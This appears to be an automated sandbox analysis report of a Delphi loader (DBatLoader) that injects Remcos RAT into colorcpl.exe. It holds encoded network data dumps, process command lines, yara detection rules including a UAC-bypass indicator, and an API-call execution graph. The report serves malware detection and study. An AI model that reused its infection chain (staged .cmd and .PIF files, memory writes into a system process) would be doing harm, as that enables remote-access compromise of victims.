                                      2024-12-17 18:47:03 UTC8192INData Raw: 63 77 34 78 6a 51 4c 39 39 38 6c 33 34 54 4c 69 61 46 33 64 78 62 36 35 36 38 7a 6e 69 6f 70 33 38 71 7a 41 66 4c 49 50 43 6c 36 78 4d 46 68 4f 4a 4c 4b 43 41 6f 59 69 6d 5a 45 43 46 4f 39 61 48 4d 38 65 4e 67 32 36 71 4b 53 30 41 56 52 53 74 35 48 4b 6e 31 41 54 38 79 4a 52 2b 6a 50 74 54 78 46 6c 57 62 51 65 6f 42 74 65 4f 30 6f 68 57 48 73 44 52 57 2b 4f 46 56 4e 53 50 77 52 36 69 63 73 4c 4a 6d 53 4e 63 49 42 75 5a 64 39 59 48 35 31 6c 44 37 6a 4d 50 6a 4b 53 52 33 37 4e 5a 4e 66 7a 32 4f 62 33 75 52 44 65 52 6e 74 56 75 46 6c 35 6a 62 41 41 43 73 6a 4d 35 61 5a 43 33 79 6a 34 7a 70 35 67 56 74 7a 32 49 49 42 33 77 48 53 66 37 34 71 43 34 52 38 46 67 77 51 74 6b 56 33 65 32 4a 50 6b 70 52 69 76 56 4a 32 77 76 70 47 74 49 5a 2b 4f 62 76 32 32 59 51 79
                                      Data Ascii: cw4xjQL998l34TLiaF3dxb6568zniop38qzAfLIPCl6xMFhOJLKCAoYimZECFO9aHM8eNg26qKS0AVRSt5HKn1AT8yJR+jPtTxFlWbQeoBteO0ohWHsDRW+OFVNSPwR6icsLJmSNcIBuZd9YH51lD7jMPjKSR37NZNfz2Ob3uRDeRntVuFl5jbAACsjM5aZC3yj4zp5gVtz2IIB3wHSf74qC4R8FgwQtkV3e2JPkpRivVJ2wvpGtIZ+Obv22YQy
                                      2024-12-17 18:47:03 UTC8192INData Raw: 45 2b 64 41 73 39 53 66 35 42 42 37 51 4a 4c 57 78 49 66 68 76 59 50 6c 57 37 48 73 58 38 66 4f 57 77 50 65 79 41 42 2b 54 4d 77 74 4e 49 46 6b 33 59 47 61 47 62 47 53 4a 2f 49 6d 35 4a 63 79 47 56 75 51 45 4b 45 4a 34 68 64 6f 76 6f 70 63 4d 50 6f 73 48 31 43 73 6a 4d 4f 44 48 47 44 49 49 6b 76 6a 66 45 31 74 6c 6a 55 51 48 4d 72 41 4c 64 6c 75 4f 52 76 47 47 53 76 73 56 7a 44 68 43 4d 2f 52 31 4e 4d 51 58 53 31 39 6d 55 59 71 39 41 55 53 56 4e 65 2b 6b 45 41 68 34 2f 4c 6b 38 67 4b 72 6e 55 41 65 50 55 45 32 55 65 59 76 32 68 4a 56 4f 4b 2f 72 59 65 76 49 55 6e 75 51 7a 79 72 67 78 4d 4e 65 59 34 30 35 58 35 67 6b 56 36 30 30 71 45 43 37 30 71 43 6e 4f 74 57 33 71 70 31 36 6a 62 43 48 53 58 4f 2b 79 4c 43 67 59 41 63 42 44 4e 50 57 75 52 4b 64 48 2b 70
                                      Data Ascii: E+dAs9Sf5BB7QJLWxIfhvYPlW7HsX8fOWwPeyAB+TMwtNIFk3YGaGbGSJ/Im5JcyGVuQEKEJ4hdovopcMPosH1CsjMODHGDIIkvjfE1tljUQHMrALdluORvGGSvsVzDhCM/R1NMQXS19mUYq9AUSVNe+kEAh4/Lk8gKrnUAePUE2UeYv2hJVOK/rYevIUnuQzyrgxMNeY405X5gkV600qEC70qCnOtW3qp16jbCHSXO+yLCgYAcBDNPWuRKdH+p
                                      2024-12-17 18:47:03 UTC8192INData Raw: 58 77 79 72 54 45 50 32 6e 43 61 72 62 4a 6d 53 4d 45 76 51 39 4a 4e 53 66 4e 6b 32 56 4a 4e 75 6b 65 4f 72 72 34 47 79 4a 69 78 79 4c 6a 6d 4a 6e 32 48 4c 63 7a 72 68 30 77 36 72 57 73 70 74 56 74 76 72 6d 4a 45 36 32 54 4e 33 36 6c 68 67 67 69 59 7a 41 67 55 31 33 78 72 7a 6a 61 78 6e 6b 69 6c 30 70 4d 76 70 71 52 4c 41 78 32 56 2f 72 6c 6b 79 39 63 61 56 4c 53 54 4a 38 4b 30 79 5a 38 57 4e 75 66 55 45 35 4d 76 64 73 38 4b 44 47 7a 45 74 75 50 6b 6b 62 38 6f 78 67 2b 2f 48 63 56 49 5a 45 45 6c 2f 67 32 52 44 55 54 46 48 68 6a 44 68 37 5a 72 62 54 42 50 6d 65 74 31 68 55 4e 72 48 70 33 75 4d 67 43 49 34 68 6d 30 70 70 32 32 74 53 43 30 74 42 59 56 76 43 45 5a 35 6f 52 68 5a 73 75 42 47 65 49 61 70 4f 51 35 53 65 36 55 39 35 6b 55 51 6f 6a 5a 36 64 61 52
                                      Data Ascii: XwyrTEP2nCarbJmSMEvQ9JNSfNk2VJNukeOrr4GyJixyLjmJn2HLczrh0w6rWsptVtvrmJE62TN36lhggiYzAgU13xrzjaxnkil0pMvpqRLAx2V/rlky9caVLSTJ8K0yZ8WNufUE5Mvds8KDGzEtuPkkb8oxg+/HcVIZEEl/g2RDUTFHhjDh7ZrbTBPmet1hUNrHp3uMgCI4hm0pp22tSC0tBYVvCEZ5oRhZsuBGeIapOQ5Se6U95kUQojZ6daR
                                      2024-12-17 18:47:03 UTC8192INData Raw: 6f 59 51 35 49 52 77 45 30 79 42 4e 66 6e 48 47 49 51 6e 4b 32 71 76 43 76 51 4b 4b 4a 44 6a 45 77 58 4a 54 31 31 45 76 6b 4e 52 49 2f 6a 45 72 72 66 35 38 43 4e 73 74 4b 42 76 4b 33 41 34 78 64 68 77 44 72 71 46 4d 41 6d 6c 41 35 6e 30 35 6a 6b 58 76 63 68 51 47 55 43 45 2f 68 76 6d 2f 74 75 69 48 34 46 54 67 70 50 4d 4f 4f 50 51 47 59 51 6c 77 53 70 66 2b 52 45 45 31 70 4b 49 4f 61 36 4a 6e 65 55 50 64 34 6d 67 78 59 6e 2f 63 37 79 53 68 48 69 74 79 77 63 63 38 6e 37 75 49 73 33 74 57 66 52 51 68 35 73 2f 75 62 31 79 31 75 50 32 55 79 59 67 5a 38 4e 78 51 6a 49 6c 42 54 72 65 45 74 5a 47 6e 4a 30 69 41 39 78 43 38 32 5a 62 4b 56 65 57 47 49 55 39 7a 6d 4c 36 6a 64 46 2f 57 64 73 63 49 38 44 65 43 6f 47 4e 6c 57 7a 34 32 67 4f 2f 45 76 6c 6f 58 51 52 4f
                                      Data Ascii: oYQ5IRwE0yBNfnHGIQnK2qvCvQKKJDjEwXJT11EvkNRI/jErrf58CNstKBvK3A4xdhwDrqFMAmlA5n05jkXvchQGUCE/hvm/tuiH4FTgpPMOOPQGYQlwSpf+REE1pKIOa6JneUPd4mgxYn/c7yShHitywcc8n7uIs3tWfRQh5s/ub1y1uP2UyYgZ8NxQjIlBTreEtZGnJ0iA9xC82ZbKVeWGIU9zmL6jdF/WdscI8DeCoGNlWz42gO/EvloXQRO
                                      2024-12-17 18:47:03 UTC8192INData Raw: 54 6b 6d 49 53 32 48 79 68 75 4d 38 7a 64 62 75 49 70 49 67 69 4b 30 69 63 32 77 6e 47 79 70 74 39 65 75 2f 38 6a 39 72 63 52 67 46 75 66 39 38 2f 6e 31 55 4d 56 73 4d 4f 34 49 72 48 54 71 5a 4b 54 58 4b 4c 5a 69 6f 43 52 78 2b 5a 79 6e 6b 31 62 6a 54 4a 69 56 41 61 50 70 55 6f 45 78 7a 55 69 55 70 59 4b 76 77 70 4e 59 67 70 47 53 4b 72 72 4e 68 51 35 59 65 4c 42 2f 36 51 2f 64 38 32 44 4a 6b 7a 76 49 6a 43 74 4a 4d 73 6f 4f 4f 4b 58 75 50 4f 49 64 72 68 70 30 54 66 34 6c 68 53 30 73 6e 7a 64 66 73 49 33 66 73 54 4d 72 73 4f 4a 31 38 6b 56 6c 74 64 4b 4b 76 36 4b 33 5a 6f 62 6a 2f 61 39 72 31 30 61 58 50 47 4e 7a 61 76 30 41 6e 55 77 56 51 57 56 57 54 64 50 33 57 41 2f 33 2b 69 6c 59 30 6a 62 4d 68 76 73 33 76 33 58 33 5a 54 57 4c 53 4d 61 70 36 55 50 49
                                      Data Ascii: TkmIS2HyhuM8zdbuIpIgiK0ic2wnGypt9eu/8j9rcRgFuf98/n1UMVsMO4IrHTqZKTXKLZioCRx+Zynk1bjTJiVAaPpUoExzUiUpYKvwpNYgpGSKrrNhQ5YeLB/6Q/d82DJkzvIjCtJMsoOOKXuPOIdrhp0Tf4lhS0snzdfsI3fsTMrsOJ18kVltdKKv6K3Zobj/a9r10aXPGNzav0AnUwVQWVWTdP3WA/3+ilY0jbMhvs3v3X3ZTWLSMap6UPI
                                      2024-12-17 18:47:04 UTC8192INData Raw: 58 7a 59 55 5a 34 48 56 37 38 71 38 4f 30 6f 6a 7a 67 59 78 4d 58 65 6f 63 68 61 76 54 6b 72 4a 41 62 75 2f 41 53 56 33 75 67 35 67 34 6d 51 4d 44 36 47 32 39 66 51 45 6b 31 6d 78 57 51 49 54 75 41 53 33 57 6d 42 62 4b 49 30 58 36 51 76 74 6b 48 73 2b 77 4f 35 7a 39 6e 37 70 47 6f 30 51 67 72 4a 76 6f 35 64 6e 54 56 32 42 41 63 6e 4d 65 30 7a 79 55 43 79 2f 59 6d 52 5a 4b 58 6d 71 4d 59 73 44 48 70 6d 58 4d 43 45 45 79 6b 54 55 48 4f 4d 59 79 73 43 45 79 48 34 36 78 39 38 48 75 70 6c 77 66 59 30 57 39 2f 52 69 38 78 7a 66 6c 5a 67 47 72 4a 35 56 52 38 69 73 71 49 7a 4e 6c 74 41 6b 4f 64 57 2f 31 51 4e 74 2f 35 48 4a 62 70 44 75 42 43 77 76 71 2b 31 39 42 41 6d 63 61 55 79 6b 42 4b 66 6a 4d 34 55 6c 59 6f 45 6e 4c 33 56 68 52 6a 5a 49 35 49 79 6e 47 37 55
                                      Data Ascii: XzYUZ4HV78q8O0ojzgYxMXeochavTkrJAbu/ASV3ug5g4mQMD6G29fQEk1mxWQITuAS3WmBbKI0X6QvtkHs+wO5z9n7pGo0QgrJvo5dnTV2BAcnMe0zyUCy/YmRZKXmqMYsDHpmXMCEEykTUHOMYysCEyH46x98HuplwfY0W9/Ri8xzflZgGrJ5VR8isqIzNltAkOdW/1QNt/5HJbpDuBCwvq+19BAmcaUykBKfjM4UlYoEnL3VhRjZI5IynG7U
                                      2024-12-17 18:47:04 UTC8192INData Raw: 39 43 35 6e 35 42 31 2b 70 67 38 4e 6a 33 2f 62 7a 37 32 55 6b 71 32 73 6d 75 47 61 58 47 41 57 73 56 59 33 56 4c 6c 49 54 2b 77 2f 78 71 4d 77 58 6b 5a 78 33 36 6e 76 33 71 69 36 54 39 6e 69 5a 69 6c 58 73 4f 45 77 51 41 39 58 31 4a 30 43 30 4e 50 35 4a 33 56 4e 79 2b 78 71 4e 4a 5a 4f 63 66 57 34 70 58 76 53 37 2b 4c 70 42 62 70 4c 31 6f 35 36 65 2b 4b 35 77 43 43 69 58 32 47 48 31 37 2b 73 61 35 4f 74 59 6e 4f 37 2f 53 36 66 32 46 30 63 5a 6f 31 4c 33 45 6a 4f 70 75 51 38 34 6e 6d 54 52 59 56 32 4d 61 64 38 52 72 57 61 71 42 44 45 54 53 68 49 35 56 49 56 32 57 53 50 76 71 35 65 6d 45 37 55 48 36 39 78 63 49 77 54 2f 6d 34 77 57 4d 42 43 6b 62 6f 55 55 55 79 53 37 72 4c 38 46 4b 55 69 57 6d 30 45 71 6e 48 61 52 6c 6e 68 36 61 6c 68 32 54 55 61 65 2b 73
                                      Data Ascii: 9C5n5B1+pg8Nj3/bz72Ukq2smuGaXGAWsVY3VLlIT+w/xqMwXkZx36nv3qi6T9niZilXsOEwQA9X1J0C0NP5J3VNy+xqNJZOcfW4pXvS7+LpBbpL1o56e+K5wCCiX2GH17+sa5OtYnO7/S6f2F0cZo1L3EjOpuQ84nmTRYV2Mad8RrWaqBDETShI5VIV2WSPvq5emE7UH69xcIwT/m4wWMBCkboUUUyS7rL8FKUiWm0EqnHaRlnh6alh2TUae+s


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:13:46:59
                                      Start date:17/12/2024
                                      Path:C:\Users\user\Desktop\MeP66xi1AM.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\MeP66xi1AM.exe"
                                      Imagebase:0x400000
                                      File size:952'320 bytes
                                      MD5 hash:F8CDBDF8318C11C2E3E286195F067042
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:Borland Delphi
                                      Yara matches:
                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.2176891397.000000007EBA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.2115600641.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2193478070.0000000002317000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.2113194413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.2115096749.000000007FD80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:13:47:05
                                      Start date:17/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                      Imagebase:0x1c0000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:4
                                      Start time:13:47:05
                                      Start date:17/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff66e660000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:13:47:05
                                      Start date:17/12/2024
                                      Path:C:\Windows\SysWOW64\colorcpl.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\System32\colorcpl.exe
                                      Imagebase:0x420000
                                      File size:86'528 bytes
                                      MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.4570116894.0000000002AD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:moderate
                                      Has exited:false

                                      General

                                      Target ID:7
                                      Start time:13:47:18
                                      Start date:17/12/2024
                                      Path:C:\Users\Public\Libraries\Wnbcdrjt.PIF
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\Public\Libraries\Wnbcdrjt.PIF"
                                      Imagebase:0x400000
                                      File size:952'320 bytes
                                      MD5 hash:F8CDBDF8318C11C2E3E286195F067042
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:Borland Delphi
                                      Yara matches:
                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 53%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:9
                                      Start time:13:47:19
                                      Start date:17/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                      Imagebase:0x1c0000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:10
                                      Start time:13:47:19
                                      Start date:17/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff66e660000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:11
                                      Start time:13:47:19
                                      Start date:17/12/2024
                                      Path:C:\Windows\SysWOW64\colorcpl.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\System32\colorcpl.exe
                                      Imagebase:0x420000
                                      File size:86'528 bytes
                                      MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:15.7%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:19.1%
                                        Total number of Nodes:277
                                        Total number of Limit Nodes:14
                                        execution_graph 25063 2b567c4 25880 2b3480c 25063->25880 25881 2b3481d 25880->25881 25882 2b34843 25881->25882 25883 2b3485a 25881->25883 25889 2b34b78 25882->25889 25898 2b34570 25883->25898 25886 2b34850 25887 2b3488b 25886->25887 25903 2b34500 25886->25903 25890 2b34b85 25889->25890 25897 2b34bb5 25889->25897 25891 2b34bae 25890->25891 25894 2b34b91 25890->25894 25895 2b34570 11 API calls 25891->25895 25893 2b34b9f 25893->25886 25909 2b32c44 11 API calls 25894->25909 25895->25897 25910 2b344ac 25897->25910 25899 2b34574 25898->25899 25900 2b34598 25898->25900 25915 2b32c10 11 API calls 25899->25915 25900->25886 25902 2b34581 25902->25886 25904 2b34504 25903->25904 25905 2b34514 25903->25905 25904->25905 25907 2b34570 11 API calls 25904->25907 25906 2b34542 25905->25906 25916 2b32c2c 11 API calls 25905->25916 25906->25887 25907->25905 25909->25893 25911 2b344b2 25910->25911 25912 2b344cd 25910->25912 25911->25912 25914 2b32c2c 11 API calls 25911->25914 25912->25893 25914->25912 25915->25902 25916->25906 25917 2b5bb44 25920 2b4ec74 25917->25920 25921 2b4ec7c 25920->25921 25921->25921 28904 2b4870c LoadLibraryW 25921->28904 25923 2b4ec9e 28909 2b32ee0 QueryPerformanceCounter 25923->28909 25925 2b4eca3 25926 2b4ecad InetIsOffline 25925->25926 25927 2b4ecb7 25926->25927 25928 2b4ecc8 25926->25928 25929 2b34500 11 API calls 25927->25929 25930 2b34500 11 API calls 25928->25930 25931 2b4ecc6 25929->25931 25930->25931 25932 2b3480c 11 API calls 25931->25932 25933 2b4ecf5 25932->25933 25934 2b4ecfd 25933->25934 28912 2b34798 25934->28912 25936 2b4ed20 25937 2b4ed28 25936->25937 25938 2b4ed32 25937->25938 28927 2b48824 25938->28927 25941 2b3480c 11 API calls 25942 2b4ed59 25941->25942 25943 2b4ed61 25942->25943 25944 2b34798 11 API calls 25943->25944 25945 2b4ed84 25944->25945 25946 2b4ed8c 25945->25946 28940 2b346a4 25946->28940 28942 2b480c8 28904->28942 28906 2b48745 28953 2b47d00 28906->28953 28910 2b32ef8 GetTickCount 28909->28910 28911 2b32eed 28909->28911 28910->25925 28911->25925 28913 2b347fd 28912->28913 28914 2b3479c 28912->28914 28915 2b34500 28914->28915 28916 2b347a4 28914->28916 28920 2b34570 11 API calls 28915->28920 28922 2b34514 28915->28922 28916->28913 28917 2b347b3 28916->28917 28919 2b34500 11 API calls 28916->28919 28921 2b34570 11 API calls 28917->28921 28918 2b34542 28918->25936 28919->28917 28920->28922 28924 2b347cd 28921->28924 28922->28918 28990 2b32c2c 11 API calls 28922->28990 28925 2b34500 11 API calls 28924->28925 28926 2b347f9 28925->28926 28926->25936 28928 2b48838 28927->28928 28929 2b48857 LoadLibraryA 28928->28929 28930 2b48867 28929->28930 28931 2b48020 17 API calls 28930->28931 28932 2b4886d 28931->28932 28933 2b480c8 15 API calls 28932->28933 28934 2b48886 28933->28934 28935 2b47d00 18 API calls 28934->28935 28936 2b488e5 FreeLibrary 28935->28936 28937 2b488fd 28936->28937 28938 2b344d0 11 API calls 28937->28938 28939 2b4890a 28938->28939 28939->25941 28941 2b346aa 28940->28941 28943 2b34500 11 API calls 28942->28943 28944 2b480ed 28943->28944 28967 2b47914 28944->28967 28947 2b34798 11 API calls 28948 2b48107 28947->28948 28949 2b4810f GetModuleHandleW GetProcAddress GetProcAddress 28948->28949 28950 2b48142 28949->28950 28973 2b344d0 28950->28973 28954 2b34500 11 API calls 28953->28954 28955 2b47d25 28954->28955 28956 2b47914 12 API calls 28955->28956 28957 2b47d32 28956->28957 28958 2b34798 11 API calls 28957->28958 28959 2b47d42 28958->28959 28979 2b48020 28959->28979 28962 2b480c8 15 API calls 28963 2b47d5b NtWriteVirtualMemory 28962->28963 28964 2b47d87 28963->28964 28965 2b344d0 11 API calls 28964->28965 28966 2b47d94 FreeLibrary 28965->28966 28966->25923 28968 2b47925 28967->28968 28969 2b34b78 11 API calls 28968->28969 28971 2b47935 28969->28971 28970 2b479a1 28970->28947 28971->28970 28977 2b3ba44 CharNextA 28971->28977 28975 2b344d6 28973->28975 28974 2b344fc 28974->28906 28975->28974 28978 2b32c2c 11 API calls 28975->28978 28977->28971 28978->28975 28980 2b34500 11 API calls 28979->28980 28981 2b48043 28980->28981 28982 2b47914 12 API calls 28981->28982 28983 2b48050 28982->28983 28984 2b48058 GetModuleHandleA 28983->28984 28985 2b480c8 15 API calls 28984->28985 28986 2b48069 GetModuleHandleA 28985->28986 28987 2b48087 28986->28987 28988 2b344ac 11 API calls 28987->28988 28989 2b47d55 28988->28989 28989->28962 28990->28918 28991 2b5c2fc 29001 2b36518 28991->29001 28995 2b5c32a 29006 2b5bb50 timeSetEvent 28995->29006 28997 2b5c334 28998 2b5c342 GetMessageA 28997->28998 28999 2b5c336 TranslateMessage DispatchMessageA 28998->28999 29000 2b5c352 28998->29000 28999->28998 29002 2b36523 29001->29002 29007 2b34168 29002->29007 29005 2b3427c SysAllocStringLen SysFreeString SysReAllocStringLen 29005->28995 29006->28997 29008 2b341ae 29007->29008 29009 2b34227 29008->29009 29010 2b343b8 29008->29010 29021 2b34100 29009->29021 29013 2b343e9 29010->29013 29016 2b343fa 29010->29016 29026 2b3432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 29013->29026 29015 2b343f3 29015->29016 29017 2b3443f FreeLibrary 29016->29017 29018 2b34463 29016->29018 29017->29016 29019 2b34472 ExitProcess 29018->29019 29020 2b3446c 29018->29020 29020->29019 29022 2b34143 29021->29022 29023 2b34110 29021->29023 29022->29005 29023->29022 29027 2b35814 29023->29027 29031 2b315cc 29023->29031 29026->29015 29028 2b35824 GetModuleFileNameA 29027->29028 29029 2b35840 29027->29029 29035 2b35a78 GetModuleFileNameA RegOpenKeyExA 29028->29035 29029->29023 29054 2b31560 29031->29054 29033 2b315d4 VirtualAlloc 29034 2b315eb 29033->29034 29034->29023 29036 2b35afb 29035->29036 29037 2b35abb RegOpenKeyExA 29035->29037 29053 2b358b4 12 API calls 29036->29053 29037->29036 29038 2b35ad9 RegOpenKeyExA 29037->29038 29038->29036 29040 2b35b84 lstrcpynA GetThreadLocale GetLocaleInfoA 29038->29040 29042 2b35bbb 29040->29042 29043 2b35c9e 29040->29043 29041 2b35b20 RegQueryValueExA 29044 2b35b5e RegCloseKey 29041->29044 29045 2b35b40 RegQueryValueExA 29041->29045 29042->29043 29047 2b35bcb lstrlenA 29042->29047 29043->29029 29044->29029 29045->29044 29048 2b35be3 29047->29048 29048->29043 29049 2b35c30 29048->29049 29050 2b35c08 lstrcpynA LoadLibraryExA 29048->29050 29049->29043 29051 2b35c3a lstrcpynA LoadLibraryExA 29049->29051 29050->29049 29051->29043 29052 2b35c6c lstrcpynA LoadLibraryExA 29051->29052 29052->29043 29053->29041 29055 2b31500 29054->29055 29055->29033 29056 2b34e88 29057 2b34e95 29056->29057 29060 2b34e9c 29056->29060 29065 2b34bdc SysAllocStringLen 29057->29065 29062 2b34bfc 29060->29062 29063 2b34c02 SysFreeString 29062->29063 29064 2b34c08 29062->29064 29063->29064 29065->29060 29066 2b31c6c 29067 2b31d04 29066->29067 29068 2b31c7c 29066->29068 29069 2b31f58 29067->29069 29070 2b31d0d 29067->29070 29071 2b31cc0 29068->29071 29072 2b31c89 29068->29072 29076 2b31fec 29069->29076 29080 2b31f68 29069->29080 29081 2b31fac 29069->29081 29073 2b31d25 29070->29073 29088 2b31e24 29070->29088 29074 2b31724 10 API calls 29071->29074 29075 2b31c94 29072->29075 29114 2b31724 29072->29114 29078 2b31d2c 29073->29078 29084 2b31d48 29073->29084 29089 2b31dfc 29073->29089 29098 2b31cd7 29074->29098 29077 2b31e7c 29083 2b31724 10 API calls 29077->29083 29100 2b31e95 29077->29100 29082 2b31724 10 API calls 29080->29082 29086 2b31fb2 29081->29086 29090 2b31724 10 API calls 29081->29090 29099 2b31f82 29082->29099 29102 2b31f2c 29083->29102 29093 2b31d79 Sleep 29084->29093 29106 2b31d9c 29084->29106 29085 2b31cfd 29087 2b31cb9 29088->29077 29092 2b31e55 Sleep 29088->29092 29088->29100 29094 2b31724 10 API calls 29089->29094 29105 2b31fc1 29090->29105 29091 2b31fa7 29092->29077 29095 2b31e6f Sleep 29092->29095 29096 2b31d91 Sleep 29093->29096 29093->29106 29109 2b31e05 29094->29109 29095->29088 29096->29084 29097 2b31ca1 29097->29087 29138 2b31a8c 29097->29138 29098->29085 29104 2b31a8c 8 API calls 29098->29104 29099->29091 29107 2b31a8c 8 API calls 29099->29107 29102->29100 29108 2b31a8c 8 API calls 29102->29108 29103 2b31e1d 29104->29085 29105->29091 29110 2b31a8c 8 API calls 29105->29110 29107->29091 29111 2b31f50 29108->29111 29109->29103 29112 2b31a8c 8 API calls 29109->29112 29113 2b31fe4 29110->29113 29112->29103 29115 2b31968 29114->29115 29116 2b3173c 29114->29116 29117 2b31938 29115->29117 29118 2b31a80 29115->29118 29126 2b317cb Sleep 29116->29126 29128 2b3174e 29116->29128 29122 2b31947 Sleep 29117->29122 29131 2b31986 29117->29131 29120 2b31684 VirtualAlloc 29118->29120 29121 2b31a89 29118->29121 29119 2b3175d 29119->29097 29123 2b316bf 29120->29123 29124 2b316af 29120->29124 29121->29097 29125 2b3195d Sleep 29122->29125 29122->29131 29123->29097 29155 2b31644 29124->29155 29125->29117 29126->29128 29130 2b317e4 Sleep 29126->29130 29128->29119 29129 2b3182c 29128->29129 29132 2b3180a Sleep 29128->29132 29136 2b315cc VirtualAlloc 29129->29136 29137 2b31838 29129->29137 29130->29116 29133 2b315cc VirtualAlloc 29131->29133 29135 2b319a4 29131->29135 29132->29129 29134 2b31820 Sleep 29132->29134 29133->29135 29134->29128 29135->29097 29136->29137 29137->29097 29139 2b31aa1 29138->29139 29140 2b31b6c 29138->29140 29142 2b31aa7 29139->29142 29143 2b31b13 Sleep 29139->29143 29141 2b316e8 29140->29141 29140->29142 29145 2b31c66 29141->29145 29148 2b31644 2 API calls 29141->29148 29144 2b31ab0 29142->29144 29147 2b31b4b Sleep 29142->29147 29152 2b31b81 29142->29152 29143->29142 29146 2b31b2d Sleep 29143->29146 29144->29087 29145->29087 29146->29139 29150 2b31b61 Sleep 29147->29150 29147->29152 29149 2b316f5 VirtualFree 29148->29149 29151 2b3170d 